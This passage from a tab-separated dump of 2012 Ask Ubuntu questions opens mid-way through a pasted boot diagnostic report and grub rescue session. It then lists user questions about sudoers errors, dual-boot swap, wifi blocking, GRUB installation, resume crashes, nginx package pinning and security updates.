7aa47a24-93a0-d54f-a03c-495cf2ee0927 ext2 /dev/sda1 3c98-ac5d vfat recovery /dev/sda2 94ca2d3cca2d1bcc ntfs vistaos /dev/sda5 a2f09f72f09f4b83 ntfs data /dev/sdb1 a4befd4a-f91f-4f09-9d5f-a44991ed6a2e ext2 /dev/sdb3 973a36d7-5828-4291-b455-db286cd69668 xfs /dev/sdb5 9ce43dea-fd93-4343-969d-1243397724bd swap /dev/sdc1 7232-c522 vfat gooddrive ================================ mount points : ================================= device mount_point type options /dev/loop0 /rofs squashfs ( ro , noatime ) /dev/sdc1 /cdrom vfat ( rw , relatime , fmask=0022 , dmask=0022 , codepage=cp437 , iocharset=iso8859-1 , shortname=mixed , errors=remount-ro ) =========================== sdb1/boot/grub/grub.cfg : =========================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { insmod vbe insmod vga insmod video_bochs insmod video_cirrus } insmod part_msdos insmod ext2 set root= ' ( hd1 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root a4befd4a-f91f-4f09-9d5f-a44991ed6a2e if loadfont /usr/share/grub/unicode.pf2 ; then set gfxmode=auto load_video insmod gfxterm insmod part_msdos insmod ext2 set root= ' ( hd1 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root a4befd4a-f91f-4f09-9d5f-a44991ed6a2e set locale_dir= ( $ root ) /boot/grub/locale set lang=pl_pl insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ 1 '' if [ `` $ 1 '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ $ { recordfail } ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode if [ `` $ linux_gfx_mode '' ! = `` text '' ] ; then load_video ; fi menuentry 'ubuntu , za pomocą systemu linux 3.2.0-23-generic-pae ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd1 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root a4befd4a-f91f-4f09-9d5f-a44991ed6a2e linux /boot/vmlinuz-3.2.0-23-generic-pae root=/dev/sdb1 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.2.0-23-generic-pae } menuentry 'ubuntu , za pomocą systemu linux 3.2.0-23-generic-pae ( tryb ratunkowy ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd1 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root a4befd4a-f91f-4f09-9d5f-a44991ed6a2e echo 'wczytywanie systemu linux 3.2.0-23-generic-pae ... ' linux /boot/vmlinuz-3.2.0-23-generic-pae root=/dev/sdb1 ro recovery nomodeset echo 'wczytywanie początkowego dysku ram ... ' initrd /boot/initrd.img-3.2.0-23-generic-pae } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod part_msdos insmod ext2 set root= ' ( hd1 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root a4befd4a-f91f-4f09-9d5f-a44991ed6a2e linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod part_msdos insmod ext2 set root= ' ( hd1 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root a4befd4a-f91f-4f09-9d5f-a44991ed6a2e linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # menuentry `` windows recovery environment ( loader ) ( on /dev/sda1 ) '' -- class windows -- class os { insmod part_msdos insmod fat set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 3c98-ac5d drivemap -s ( hd0 ) $ { root } chainloader +1 } menuentry `` windows vista ( loader ) ( on /dev/sda2 ) '' -- class windows -- class os { insmod part_msdos insmod ntfs set root= ' ( hd0 , msdos2 ) ' search -- no-floppy -- fs-uuid -- set=root 94ca2d3cca2d1bcc chainloader +1 } # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =============================== sdb1/etc/fstab : ================================ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sdb1 during installation uuid=a4befd4a-f91f-4f09-9d5f-a44991ed6a2e / ext2 errors=remount-ro 0 1 # swap was on /dev/sdb5 during installation uuid=9ce43dea-fd93-4343-969d-1243397724bd none swap sw 0 0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =================== sdb1 : location of files loaded by grub : ==================== gib - gb file fragment ( s ) = boot/grub/core.img 1 = boot/grub/grub.cfg 1 = boot/initrd.img-3.2.0-23-generic-pae 6 = boot/vmlinuz-3.2.0-23-generic-pae 3 = initrd.img 6 = vmlinuz 3 ========================= sdc1/syslinux/syslinux.cfg : ========================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # d-i config version 2.0 include menu.cfg default vesamenu.c32 prompt 0 timeout 50 ui gfxboot bootlogo -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ================= sdc1 : location of files loaded by syslinux : ================== gib - gb file fragment ( s ) ? ? = ? ? ldlinux.sys 1 ? ? = ? ? syslinux/chain.c32 1 ? ? = ? ? syslinux/gfxboot.c32 1 ? ? = ? ? syslinux/syslinux.cfg 1 ? ? = ? ? syslinux/vesamenu.c32 1 ============== sdc1 : version of com32 ( r ) files used by syslinux : =============== syslinux/chain.c32 : com32r module ( v4.xx ) syslinux/gfxboot.c32 : com32r module ( v4.xx ) syslinux/vesamenu.c32 : com32r module ( v4.xx ) =============================== stderr messages : =============================== xz : ( stdin ) : compressed data is corrupt awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in /home/ubuntu/pobrane/bootinfoscript-061/bootinfoscript : line 1646 : [ : 2.73495e+09 : integer expression expected i have to say that script print on terminal : boot info script 0.61 [ 1 april 2012 ] '' gawk '' could not be found , using `` busybox awk '' instead . this may lead to unreliable results . identifying mbrs ... computing partition table of /dev/sda ... computing partition table of /dev/sdb ... computing partition table of /dev/sdc ... searching sda1 for information ... searching sda2 for information ... searching sda3 for information ... searching sda5 for information ... searching sdb1 for information ... searching sdb3 for information ... searching sdb4 for information ... searching sdb5 for information ... searching sdc1 for information ... finished . the results are in the file `` results.txt '' located in `` /home/ubuntu/pobrane/bootinfoscript-061/ '' . ============== edit 18.06.2012 18:38 =============== ok , this is more or less copy of my grub recovery session : error : file not found grub recovery > set prefix= ( hd0 , msdos1 ) /boot/grub root=hd0 , msdos1 grub recovery > ls ( hd0 ) ( hd0 , msdos3 ) ( hd0 , msdos1 ) ( hd1 ) ( hd1 , msdos5 ) ( hd1 , msdos2 ) ( hd1 , msdos1 ) grub recovery > ls $ prefix error : file not found grub recovery > then i 've used 'ls ' cmd on few path , results are strange ( i think ) : grub recovery > ls ( hd0 , msdos1 ) /boot grub recovery > ls ( hd0 , msdos1 ) /boot/grub error : file not found grub recovery > ls ( hd0 , msdos1 ) /lib grub recovery > ls ( hd0 , msdos1 ) /bin grub recovery > ls ( hd0 , msdos1 ) /sys ./ ../ grub recovery > ls ( hd0 , msdos1 ) /sbin grub recovery > ls ( hd0 , msdos1 ) /usr ./ ../ local/ ( and some other things ) is this normal ? i can see /boot/grub and its content when i mount this external hdd by live ubuntu
152108	installing zfs changed my sudoers file	following the wiki 's advice , i installed ubuntu-zfs . however , once everything installed correctly , and i tried installing another application via apt-get , i get a weird issue with my sudoers file : max @ host : ~ $ sudo apt-get install deluge deluge-web sudo : /etc/sudoers.d/zfs is mode 0644 , should be 0440 > > > /etc/sudoers.d/readme : /etc/sudoers.d/zfs near line 18 < < < sudo : parse error in /etc/sudoers.d/readme near line 18 sudo : no valid sudoers sources found , quitting *** glibc detected *** sudo : double free or corruption ( ! prev ) : 0x08909d08 *** ======= backtrace : ========= ... . why has zfs messed with the sudoers file ? i can post the backtrace if needed .
152115	how to make scripts run in guake terminal instead of normal terminal ?	i have installed guake terminal and i find it amazing . i have many scripts added as .desktop files in launcher . now i want these scripts to run in the guake terminal instead of opening in the normal gnome terminal . how can i achieve this ? the .desktop file is such : [ desktop entry ] type=application terminal=true icon=/path/to/icon/icon.svg name=app-name exec=/path/to/file/mount-unmount.sh name=app-name
152118	run a script with user interaction on log out / shutdown ?	i 'd like to run a script on shut down , which interrupts the logout process and and pops up a window with zenity . my target is to get autofsck working with lightdm . it seems to work with 12.04 after installing the old *.deb file , if one runs the check script manually . in order to use it , it should run automatically on log out and ask the user if she/he wants to check the disc on shutdown . there is the option session-cleanup-script in the file /etc/lightdm/lightdm.conf which seems to work , if a bash file with full path is used ( i ca n't place the command directly there ) . but if i press shutdown , there is no time for a user choice . is there any other option to solve this problem ? edit : it seems as if there are also other problems specificially with autofsck . the session clean up script runs , but the check command for autofsck does not run .
152120	can windows and ubuntu share a single swap partition ?	i am dual booting my system with ubuntu 12.04 and windows 7 . i have created the special swap partition for ubuntu while installing ( as recommended ) . can windows use this swap area/partition -- as its own swap/page file -- when i boot from windows ?
152121	why is my amd quad 645 cpu running at 800mhz per core on ubuntu 12.04	i 've just loaded ubuntu 12.04 onto a brand box with an amd 645 quad cpu with 8gb ram . in the bios it says , the cpu is running at 3100mhz . however when i boot into ubuntu 12.04 it says 800mhz ? i 've checked using : cat /proc/cpuinfo command from the terminal and running system profiler and benchmark application . both say 800mhz at each core ? any ideas or input would be much appreciated .
152125	are we allowed to distribute our app showdown entries prior to submission ?	are we allowed to distribute our app showdown entries prior to submission for testing and feedback purposes , or is the submission supposed to be the first people see of them ?
152128	how change what kernel boots ubuntu xen vps ?	i have a vps running ubuntu server 12.04 . a while ago , my host installed an alternative kernel ( one of amazon 's ec2 kernels ) to fix a boot issue i was having . now , 2 ubuntu releases later , this kernel ( 2.6.31-302-ec2 ) is still being used even though later ( 3.2.xx ) kernels have been installed . how can i make the server use the most recent installed kernel , preferably without just uninstalling the ec2 kernel just in case doing so causes issues ?
152130	what is meant by `` novelty '' in ubuntu app contest ?	there you say `` the application must contain exclusively original code and the participant must be the original author of the content '' . so there is a problem , for example : when we convert from our program a file using ffmpeg ? . is that against novelty ?
152132	lubuntu dvd does not boot	i downloaded from lubuntu iso from the first link on the lubuntu website . burned a dvd with cd burner xp in another pc , and at the target computer changed bios boot settings to boot from cd/dvd drive first . now at the target computer there was an old ubuntu 8,04 hardy heron already installed . the dvd does not get detected when i put newly burned dvd at dvd drive . where am i wrong ? is there something that i misunderstood , for example , lubuntu is really an os which can be installed on hard disk ?
152135	why is my intel 2200bg wifi card hard-blocked ?	i have installed 12.04 on a fujitsu siemens amilo pro . wifi card does not work . have tried various threads but none have the same problem . think i have the correct firmware but the following comes up : gill @ ubuntu : ~ $ iwconfig lo no wireless extensions . eth1 ieee 802.11bg essid : off/any mode : managed channel:0 access point : not-associated bit rate:0 kb/s tx-power=off sensitivity=8/0 retry limit:7 rts thr : off fragment thr : off power management : off link quality:0 signal level:0 noise level:0 rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 eth0 no wireless extensions . also : gill @ ubuntu : ~ $ rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : yes there is a power switch for wifi but it does not do anything in ubuntu .
152139	grub install error	whenever i try to install ubuntu , i get a fatal error that reads : executing'grub-install /dev/sda ' failed . this is a fatal error . its the same as this , but my graphics appear to be running fine . also , i 'm a complete novice at this and really need simple instructions to understand what i 'm doing . i 've tried booting from a livecd and a usb stick . i do n't want to dual boot it because its an old computer that i erased xp and plan on only using linux on it . when i used a usb stick and set the persistent file storage high , i was able to run it , but only as long as the flash drive was plugged in .
152144	installing ubuntu 12.04 on efi system	fellas , need help . trying to install ubuntu 12.04 on laptop to dual boot alongside win7 . i have uefi and gpt partitioning scheme . it has optional legacy boot mode though . i can boot from ubuntu usb/cd in both legacy and uefi modes . but when i reach partition selection step , it gives me error `` ubi-partman failed with exit code 141 '' . i searched forums for this but those who encountered this error said it was resolved when they detached one of two hds in their system . but i have only one hard disk attached and i am sure ubuntu 's grub supports gpt . but looks like it is not able to read gpt partitions on my hd . any help regarding this will be appreciated .
152145	computer crashes on resume from standby almost every time	i am running ubuntu 12.04 on a core i5 2500k and asrock z68 pro3-m motherboard ( no graphics card , hd is a wd green 1tb , and cd drive is some cheap lite-on drive ) . since installing 12.04 , my computer has been freezing after resume , but not every time . when i start to resume , it starts going normally with a blinking cursor on the screen and then sometimes it will continue on to the gnome 3 unlock screen . most of the time , however , it will blink for a little bit and then the monitor will flip modes and shut off due to no signal . pressing keys on the keyboard gets no response ( num lock light does n't respond , ctrl-alt-f1 fails to drop it into a terminal , ctrl-alt-backspace does n't work ) and so i assume the computer is crashed . the worst part is , the logs look entirely normal . here is my system log during one of these crashes and my subsequent hard poweroff and restart : jun 6 21:54:43 kcuzner-desktop udevd [ 10448 ] : inotify_add_watch ( 6 , /dev/dm-2 , 10 ) failed : no such file or directory jun 6 21:54:43 kcuzner-desktop udevd [ 10448 ] : inotify_add_watch ( 6 , /dev/dm-2 , 10 ) failed : no such file or directory jun 6 21:54:43 kcuzner-desktop udevd [ 10448 ] : inotify_add_watch ( 6 , /dev/dm-1 , 10 ) failed : no such file or directory jun 6 21:54:43 kcuzner-desktop udevd [ 12419 ] : inotify_add_watch ( 6 , /dev/dm-0 , 10 ) failed : no such file or directory jun 6 21:54:43 kcuzner-desktop udevd [ 10448 ] : inotify_add_watch ( 6 , /dev/dm-0 , 10 ) failed : no such file or directory jun 6 22:09:01 kcuzner-desktop cron [ 9061 ] : ( root ) cmd ( [ -x /usr/lib/php5/maxlifetime ] & & [ -d /var/lib/php5 ] & & find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin + $ ( /usr/lib/php5/maxlifetime ) ! -execdir fuser -s { } 2 > /dev/null \ ; -delete ) jun 6 22:17:01 kcuzner-desktop cron [ 22142 ] : ( root ) cmd ( cd / & & run-parts -- report /etc/cron.hourly ) jun 6 22:39:01 kcuzner-desktop cron [ 26909 ] : ( root ) cmd ( [ -x /usr/lib/php5/maxlifetime ] & & [ -d /var/lib/php5 ] & & find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin + $ ( /usr/lib/php5/maxlifetime ) ! -execdir fuser -s { } 2 > /dev/null \ ; -delete ) jun 6 22:54:21 kcuzner-desktop kernel : [ 57905.560822 ] show_signal_msg : 36 callbacks suppressed jun 6 22:54:21 kcuzner-desktop kernel : [ 57905.560828 ] chromium-browse [ 9139 ] : segfault at 0 ip 00007f3a78efade0 sp 00007fff7e2d2c18 error 4 in chromium-browser [ 7f3a76604000+412b000 ] jun 6 23:05:43 kcuzner-desktop kernel : [ 58586.415158 ] chromium-browse [ 21025 ] : segfault at 0 ip 00007f3a78efade0 sp 00007fff7e2d2c18 error 4 in chromium-browser [ 7f3a76604000+412b000 ] jun 6 23:09:01 kcuzner-desktop cron [ 13542 ] : ( root ) cmd ( [ -x /usr/lib/php5/maxlifetime ] & & [ -d /var/lib/php5 ] & & find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin + $ ( /usr/lib/php5/maxlifetime ) ! -execdir fuser -s { } 2 > /dev/null \ ; -delete ) jun 6 23:12:43 kcuzner-desktop kernel : [ 59006.317590 ] usb 2-1.7 : usb disconnect , device number 8 jun 6 23:12:43 kcuzner-desktop kernel : [ 59006.319672 ] sd 7:0:0:0 : [ sdg ] synchronizing scsi cache jun 6 23:12:43 kcuzner-desktop kernel : [ 59006.319737 ] sd 7:0:0:0 : [ sdg ] result : hostbyte=did_no_connect driverbyte=driver_ok jun 6 23:17:01 kcuzner-desktop cron [ 26580 ] : ( root ) cmd ( cd / & & run-parts -- report /etc/cron.hourly ) jun 6 23:19:04 kcuzner-desktop acpid : client connected from 29925 [ 0:0 ] jun 6 23:19:04 kcuzner-desktop acpid : 1 client rule loaded jun 6 23:19:07 kcuzner-desktop rtkit-daemon [ 1835 ] : successfully made thread 30131 of process 30131 ( n/a ) owned by '104 ' high priority at nice level -11 . jun 6 23:19:07 kcuzner-desktop rtkit-daemon [ 1835 ] : supervising 1 threads of 1 processes of 1 users . jun 6 23:19:07 kcuzner-desktop rtkit-daemon [ 1835 ] : successfully made thread 30162 of process 30131 ( n/a ) owned by '104 ' rt at priority 5 . jun 6 23:19:07 kcuzner-desktop rtkit-daemon [ 1835 ] : supervising 2 threads of 1 processes of 1 users . jun 6 23:19:07 kcuzner-desktop rtkit-daemon [ 1835 ] : successfully made thread 30163 of process 30131 ( n/a ) owned by '104 ' rt at priority 5 . jun 6 23:19:07 kcuzner-desktop rtkit-daemon [ 1835 ] : supervising 3 threads of 1 processes of 1 users . jun 6 23:19:07 kcuzner-desktop bluetoothd [ 1140 ] : endpoint registered : sender=:1.239 path=/mediaendpoint/hfpag jun 6 23:19:07 kcuzner-desktop bluetoothd [ 1140 ] : endpoint registered : sender=:1.239 path=/mediaendpoint/a2dpsource jun 6 23:19:07 kcuzner-desktop bluetoothd [ 1140 ] : endpoint registered : sender=:1.239 path=/mediaendpoint/a2dpsink jun 6 23:19:07 kcuzner-desktop rtkit-daemon [ 1835 ] : successfully made thread 30166 of process 30166 ( n/a ) owned by '104 ' high priority at nice level -11 . jun 6 23:19:07 kcuzner-desktop rtkit-daemon [ 1835 ] : supervising 4 threads of 2 processes of 1 users . jun 6 23:19:07 kcuzner-desktop pulseaudio [ 30166 ] : [ pulseaudio ] pid.c : daemon already running . jun 6 23:19:10 kcuzner-desktop acpid : client 2942 [ 0:0 ] has disconnected jun 6 23:19:10 kcuzner-desktop acpid : client 29925 [ 0:0 ] has disconnected jun 6 23:19:10 kcuzner-desktop acpid : client connected from 1286 [ 0:0 ] jun 6 23:19:10 kcuzner-desktop acpid : 1 client rule loaded jun 6 23:19:31 kcuzner-desktop bluetoothd [ 1140 ] : endpoint unregistered : sender=:1.239 path=/mediaendpoint/hfpag jun 6 23:19:31 kcuzner-desktop bluetoothd [ 1140 ] : endpoint unregistered : sender=:1.239 path=/mediaendpoint/a2dpsource jun 6 23:19:31 kcuzner-desktop bluetoothd [ 1140 ] : endpoint unregistered : sender=:1.239 path=/mediaendpoint/a2dpsink jun 6 23:28:12 kcuzner-desktop kernel : imklog 5.8.6 , log source = /proc/kmsg started . jun 6 23:28:12 kcuzner-desktop rsyslogd : [ origin software= '' rsyslogd '' swversion= '' 5.8.6 '' x-pid= '' 1053 '' x-info= '' http : //www.rsyslog.com '' ] start jun 6 23:28:12 kcuzner-desktop rsyslogd : rsyslogd 's groupid changed to 103 jun 6 23:28:12 kcuzner-desktop rsyslogd : rsyslogd 's userid changed to 101 jun 6 23:28:12 kcuzner-desktop rsyslogd-2039 : could not open output pipe '/dev/xconsole ' [ try http : //www.rsyslog.com/e/2039 ] jun 6 23:28:12 kcuzner-desktop modem-manager [ 1070 ] : < info > loaded plugin ericsson mbm jun 6 23:28:12 kcuzner-desktop modem-manager [ 1070 ] : < info > loaded plugin sierra jun 6 23:28:12 kcuzner-desktop modem-manager [ 1070 ] : < info > loaded plugin generic jun 6 23:28:12 kcuzner-desktop modem-manager [ 1070 ] : < info > loaded plugin huawei jun 6 23:28:12 kcuzner-desktop modem-manager [ 1070 ] : < info > loaded plugin linktop jun 6 23:28:12 kcuzner-desktop bluetoothd [ 1072 ] : failed to init gatt_example plugin jun 6 23:28:12 kcuzner-desktop bluetoothd [ 1072 ] : listening for hci events on hci0 jun 6 23:28:12 kcuzner-desktop networkmanager [ 1080 ] : < info > networkmanager ( version 0.9.4.0 ) is starting ... jun 6 23:28:12 kcuzner-desktop networkmanager [ 1080 ] : < info > read config file /etc/networkmanager/networkmanager.conf jun 6 23:28:12 kcuzner-desktop networkmanager [ 1080 ] : < info > vpn : loaded org.freedesktop.networkmanager.pptp jun 6 23:28:12 kcuzner-desktop networkmanager [ 1080 ] : < info > dns : loaded plugin dnsmasq jun 6 23:28:12 kcuzner-desktop kernel : [ 0.000000 ] initializing cgroup subsys cpuset jun 6 23:28:12 kcuzner-desktop kernel : [ 0.000000 ] initializing cgroup subsys cpu sorry it 's so huge ; the restart happens at 23:28:12 i believe and all i see is that chromium segfaulted a few times . i would n't think a segfault from an individual program on the computer would crash it , but could that be the issue ?
152147	new to java programming - error help	i am going through a java book and drafting the examples and have run into the following error when compiling this code . any help would be appreciated thank you . error : main.java:3 : class addition is public , should be declared in a file named addition.java public class addition ^ 1 error code : import java.io . * ; import java.util.scanner ; public class addition { public static void main ( string [ ] args ) { java.util.scanner input = new java.util.scanner ( system.in ) ; int number1 ; int number2 ; int sum ; system.out.print ( `` enter first digit : `` ) ; number1 = input.nextint ( ) ; system.out.print ( `` enter second digit : '' ) ; number2 = input.nextint ( ) ; sum = number1 + number2 ; system.out.printf ( `` sum is % d\n , sum '' ) ; } }
152148	application/places/system menu in unity	i have disabled the global menu and want to put the classic application/places/system menu in its place . how would i go about doing that in ubuntu 12.04lts ? ( note : i do want to try keeping unity as well as the dock launcher around for now to see if i can get used to that )
152149	is the `` user accounts '' icon listed in the freedesktop icon naming specification ?	in the system settings , there 's an entry at the bottom called `` user accounts '' , and it has this icon : i 've looked through the freedesktop icon naming specification , but i ca n't seem to find anything that matches it .
152150	downgrading nvidia driver problem	i have been experiencing the bug mentioned here . people have reported downgrading their driver to 290.10 prevented the issue for them so i tried this but i am not sure whether i have installed the driver right as i am still experiencing the problem . i went here and downloaded the .deb , then to install it i ran : sudo dpkg -i nvidia-current_290.10-0ubuntu2_i386.deb there were no error messages from dpkg . i checked in the synaptic package manager that the install version was 290.10-0ubuntu2 which it is so i locked it to this version . the reason i question whether i have installed it correctly is because in the nvidia-settings it still shows the driver version as 295.49 ?
152153	where can i find educational ubuntu materials to `` spread the word '' ?	i 'm it member of gulshan.e.noor library and reading room and we are planning to give a free ubuntu seminar to a local audience which is free of cost . this will be an educational approach . if anyone has some good resources please do share .
152154	setting up port forwarding on my router to ubuntu machine	i just loaded up a older computer of mine to run a server for a game i 'm working on , ( it 's a template server ) and i need to forward ports 3200 and 3201 , so that it can be accessed both on my local network and outside the network . now , i believe i have the right settings done in my router , for i used to run rsps ( runescape private servers ) a long time ago ; but when ever i go to a website to check if the port it open ( or try running the game on a different computer hooked up to the same network ) it fails/says its still closed . now , i was just wondering if you guys could give me some help , on getting this machine to do and work the way i want it to . i have not done any port forwarding or anything in the actual os , but that is mostly because i ca n't really find any tutorials/sites with much help on that . p.s . the server is made in python and i have gotten that up and running so far . thanks !
152156	how do i prevent an external monitor from shutting off when closing my laptop lid ?	i 've seen this issue on previous versions of ubuntu , but not on 12.04 and some of those are resolved bugs , so i 'm asking again . i 've set up power management so that , when plugged in , my laptop does nothing when the lid is closed . i do this so that i can use as a desktop with my external monitor with the screen closed and the laptop scurried away from my desktop . i tried turning off the laptop monitor to see if that made a difference , but it does n't . the problem is that closing the lid still shuts off my external monitor . what can i do to prevent this ?
152157	`` enable wireless '' option is disabled in network settings	i 'm using ubuntu 11.10 ( dual booted with windows 7 ) but i 'm unable to access internet wireless even though i can do so on windows 7 . the output for rfkill list all is given below : rfkill list all 0 : brcmwl-0 : wireless lan soft blocked : no hard blocked : yes 1 : hp-wifi : wireless lan soft blocked : no hard blocked : no the output for sudo lshw -c network *-network disabled is : description : wireless interface product : bcm4313 802.11b/g/n wireless lan controller vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth1 version : 01 serial : 11:11:11:11:11:11 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=5.100.82.38 latency=0 multicast=yes wireless=ieee 802.11 resources : irq:16 memory : c2500000-c2503fff *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 05 serial : 22:22:22:22:22:22 size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8105e-1.fw latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:42 ioport:3000 ( size=256 ) memory : c0404000-c0404fff memory : c0400000-c0403fff broadcom sta wireless driver is installed , activated , and currently in use . my laptop is a hp-pavilion-g6-1004tx . my hardware switch is on . enable wireless option is also disabled in network settings .
152162	how to sync akonadi with google	i 'm trying to figure out how i can sync akonadi ( kontact ) with google in kubuntu 12.04 . i 'm looking for the akonadi-google package but i ca n't find a version of the deb for the 64 bit architecture . could someone help me with this please ? when i try to build the akonadi-google package it says it ca n't continue ./configure without libcurl . i 've installed libcurl yet i still get the same error message about libcurl being missing .
152166	how to enable option of hibernate in ubuntu 12.04 ?	i need hibernate option in ubuntu 12.04 . it was in the older versions but not in 12.04 . why ?
152178	why does apt want to upgrade my package ?	i need nginx compiled with a special flag , so i grabbed the source from the nginx stable ppa ( apt-get source ) , changed debian/rules , built it and packaged it with debuild/dpkg-buildpackage , and installed the necessary .debs -- so far so good . only now apt wants to switch my local package with the one from the repository . this is a little puzzling since both packages have the exact same version : $ dpkg -l nginx-full desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version description +++-=======================================-=======================================-============================================================================================== ii nginx-full 1.2.1-0ubuntu0ppa1~precise nginx web/proxy server ( standard version ) and $ sudo apt-get upgrade -s reading package lists ... done building dependency tree reading state information ... done the following packages will be upgraded : nginx-full 1 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . inst nginx-full [ 1.2.1-0ubuntu0ppa1~precise ] ( 1.2.1-0ubuntu0ppa1~precise stable:12.04/precise [ amd64 ] ) conf nginx-full ( 1.2.1-0ubuntu0ppa1~precise stable:12.04/precise [ amd64 ] ) why exactly is this happening , and what 's the best way of stopping it ? ideally , apt should offer to upgrade my package only with a strictly newer version , which would be a cue for me to rebuild my patched version with the newest source . i 've come across this bug report which looks pretty relevant , but since it contained no satisfactory work-around , i 'm leaving the question open .
152179	how do i check only security updates from the command-line ?	is there a way to quickly check for the availability of security updates from the command line ? on my 12.04 system running apt-get update fetches 20mb of data about available packages every time i run it , hitting many repositories along the way . then i can use any of the methods described here to actually perform the update . my question is just about detecting the availability of security updates ( ie , not performing the actual upgrade using apt-get/aptitude/etc ) : is there a quick check that can be done from the command line that provides a yes-no answer the question `` are there security updates available ? '' . i would like to run that before running the lengthy apt-get update + actual upgrade . i suppose i do n't need to download 20mb of data to know the answer to that every day .
